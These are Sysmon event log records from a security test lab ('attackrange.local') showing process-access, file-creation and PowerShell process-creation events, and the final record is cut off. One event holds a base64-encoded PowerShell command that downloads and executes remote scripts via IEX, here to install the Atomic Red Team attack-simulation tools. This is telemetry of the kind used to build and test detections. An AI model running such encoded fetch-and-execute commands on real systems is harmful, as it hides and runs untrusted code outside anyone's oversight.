{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5061,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-001046FF0600}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-001046FF0600}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5062,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:01.240\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nProcessId: 4800\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\p54jafaw.dll\r\nCreationUtcTime: 2020-08-01 06:55:01.147","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:01.240","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\p54jafaw.dll","CreationUtcTime":"2020-08-01 06:55:01.147","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5063,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.272\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.272","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5064,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.272\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.272","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5065,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.272\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.272","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5066,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.479\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nParentProcessId: 2872\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.479","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","ParentProcessId":"2872","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5067,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.475\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nSourceProcessId: 2872\r\nSourceThreadId: 3276\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44568890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 